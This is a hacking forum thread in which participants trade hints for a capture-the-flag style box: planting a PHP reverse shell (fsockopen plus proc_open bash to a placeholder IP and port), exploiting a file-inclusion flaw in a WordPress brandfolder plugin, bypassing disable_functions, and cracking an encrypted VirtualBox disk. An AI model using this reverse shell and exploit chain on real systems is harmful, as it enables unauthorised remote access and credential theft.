Can anyone explain why we can have a system shell with weevely3 even though disable_functions contains system,exec,shell_exec?

(August 7, 2022, 03:02 PM)farkow Wrote:

(August 7, 2022, 02:35 PM)Exa Wrote:

(August 7, 2022, 02:21 PM)fukingfuck Wrote: for user part.
1.go to www-data home dir = /var/www/html/logs/uploads/ this folder is writable for www-data
2.then create new folder. e.g "mkdir wp"
3.now go to /var/www/html/logs/uploads/wp and create reverse shell (!!!name it!!! wp-load.php):
<?php
$sock=fsockopen("IP",PORT);$proc=proc_open("bash", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);
?>
4.also create directory wp-admin/includes 
5. now go to /var/www/html/logs/uploads/wp/wp-admin/includes and create files media.php, file.php, image.php, post.php with following content: <?php echo '123'; ?>
6. navigate to ur browser/proxy and request "GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=/var/www/html/logs/uploads/wp/"

if u wana know whats going on read "/opt/site.new/wp-content/plugins/brandfolder/callback.php" and https://www.exploit-db.com/exploits/39591

Thanks @farkow and @fukingfuck, finally got the user flag.
For some reason, creating the directory under /tmp doesn't work. /var/www/html/logs/uploads/wp works fine though.

Anytime! I used /dev/shm.
Stuck on root part at the moment actually. Trying to figure out how to open an encrypted vdi file. Somehow, the box and the key itself is not applied in vm and it is not mounted.

// on the other processor, brute forcing :P

https://github.com/hashcat/hashcat/blob/master/tools/virtualbox2hashcat.py and https://www.virtualbox.org/wiki/Downloads#VirtualBox6.1.36OracleVMVirtualBoxExtensionPack 

After, keep the brute going.

(August 7, 2022, 03:26 PM)Exa Wrote: Can anyone explain why we can have a system shell with weevely3 even though disable_functions contains system,exec,shell_exec?

popen. https://github.com/epinna/weevely3/blob/master/modules/shell/sh.py#L31

(August 7, 2022, 03:39 PM)Hacker2222 Wrote: where is the virtualbox vdi at?

You have to be jack first, and you will see for sure

im getting segmant fault with chisel ><

[align=justify]found
|       5 | SSH key       | [email protected] | <SSHKEY>

in sql db[/align]

How do i correctly mount the vdi file ? I keep getting a uuid error.

i can't decrypt ciphertext  :s , is the "SELECT * FROM wp_options where option_name LIKE 'pms_encrypt_key'" secret key ?

(August 7, 2022, 04:16 PM)vexxxi Wrote: [align=justify]found
|       5 | SSH key       | [email protected] | <SSHKEY>

in sql db[/align]

Where did u find it? In what table?

(August 7, 2022, 06:27 PM)m4rsh3ll Wrote:

(August 7, 2022, 04:16 PM)vexxxi Wrote: [align=justify]found
|       5 | SSH key       | [email protected] | <SSHKEY>

in sql db[/align]

Where did u find it? In what table?

its in wp_pms_passwords;
u can edit the entry for admin though and login to site